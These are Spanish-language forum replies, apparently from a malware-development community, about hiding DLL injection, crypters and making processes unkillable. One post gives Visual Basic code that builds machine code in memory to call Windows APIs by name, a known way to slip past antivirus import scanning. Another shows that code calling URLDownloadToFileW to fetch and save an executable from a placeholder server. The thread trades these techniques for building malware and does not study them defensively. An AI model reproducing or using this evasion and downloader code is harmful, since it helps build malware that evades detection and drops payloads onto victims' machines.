Mensajes

A mi me funciona perfectamente....

Por cierto xD, para ser un test te lo has currao Cobein

PD:Me toco descargar con el IEXPLORE... la pagina esa no va con FF... te recomiendo usar otra

Esta bien, pero fijate que aunque la escondas del peb..... prueba a usar EnumProcessModules y divide entre 4 el parametro cb y veras como algo no cuadra .

Lo que no cuadra es la cuenta... osea, te salen mas de las que ves... pero creo que no puedes hacer nada mas...

A ver... voy a probar

Como ya te dije en HH buen trabajo

Se puede modificar para que modifique esto en algunos procesos... haciendo así tu inyección DLL invisible... o al menos eso creo

PD:Deberías actualizar tu web

[CSocketMaster 1.2 & CSocketPlus 1.1 - Winsock classes]

CSocketMaster 1.2 & CSocketPlus 1.1 - Winsock classes

[Nhaalclkiemr]

Creo que la función ObtenerPrivilegios es de Karcrack... Si es asi deberia tener un reconocimiento...

No, no es mia... si no recuerdo mal es de Nhaalclkiemr lastima que no haya vuelto a aparecer

[Fuente:]

Código (vb) [Seleccionar] Expandir


'Call API Function
'Credits to Cobein

Declare Sub RtlMoveMemory Lib "kernel32" (dest As Any, src As Any, ByVal L As Long)
Declare Function CallWindowProcA Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long
Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long

Function CallApiByName(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long
On Error Resume Next
    Dim lPtr                As Long
    Dim bvASM(&HEC00& - 1)  As Byte
    Dim I                   As Long
    Dim lMod                As Long
   
    lMod = GetProcAddress(LoadLibraryA(sLib), sMod)
    If lMod = 0 Then Exit Function
   
    lPtr = VarPtr(bvASM(0))
    RtlMoveMemory ByVal lPtr, &H59595958, &H4:              lPtr = lPtr + 4
    RtlMoveMemory ByVal lPtr, &H5059, &H2:                  lPtr = lPtr + 2
    For I = UBound(Params) To 0 Step -1
        RtlMoveMemory ByVal lPtr, &H68, &H1:                lPtr = lPtr + 1
        RtlMoveMemory ByVal lPtr, CLng(Params(I)), &H4:     lPtr = lPtr + 4
    Next
    RtlMoveMemory ByVal lPtr, &HE8, &H1:                    lPtr = lPtr + 1
    RtlMoveMemory ByVal lPtr, lMod - lPtr - 4, &H4:         lPtr = lPtr + 4
    RtlMoveMemory ByVal lPtr, &HC3, &H1:                    lPtr = lPtr + 1
    CallApiByName = CallWindowProcA(VarPtr(bvASM(0)), 0, 0, 0, 0)
   
End Function

Código (vb) [Seleccionar] Expandir

lRet = CallApiByName("urlmon", "URLDownloadToFileW", 0, StrPtr("http://server.com/test.exe"), StrPtr("C:\test.exe"), 0, 0)

Fuente:

Código [Seleccionar] Expandir

http://hackhound.org/forum/index.php?topic=6795.0

Prueba asi...

Sorprendente Leandro... yo esperaba APIs o algo... y con un label se puede sacar esa información?

No sabia siquiera para que servían las propiedades LINK*

Saludos

Código (vb) [Seleccionar] Expandir

server.CloseSck
server.LocalPort = 6000
server.Listen

Yo lo usaba así y me funcionaba

Saludos

[[^]Karcrack Project Crypter v2.1 [KPC]]

Esta bueno, el problema que mensinas segurmante es porque no detecta los saltos de linea _ de los guion vajos. entonces remplaza la linea siguiente.

Saludos

Esta solucionado en la nueva version

[^]Karcrack Project Crypter v2.1 [KPC]

[XCryptor]

INMORTAL? Es imposible... casi cualquier metodo que conozco se puede saltar con mas o menos dificultad... el mas dificil creo que un Hook nivel Kernel... Pero en VB no es una buena eleccion...

XCryptor, con RtlSetProcessIsCritical haces que se produzca un BSOD... pero se cierra? osea, se apaga todo el PC ... osea, que ademas de no ser inmortal el proceso el PC se muere
O te dice que es critico y no te deja? Se crashea el PC en caso de forzar el cerrado?

Saludos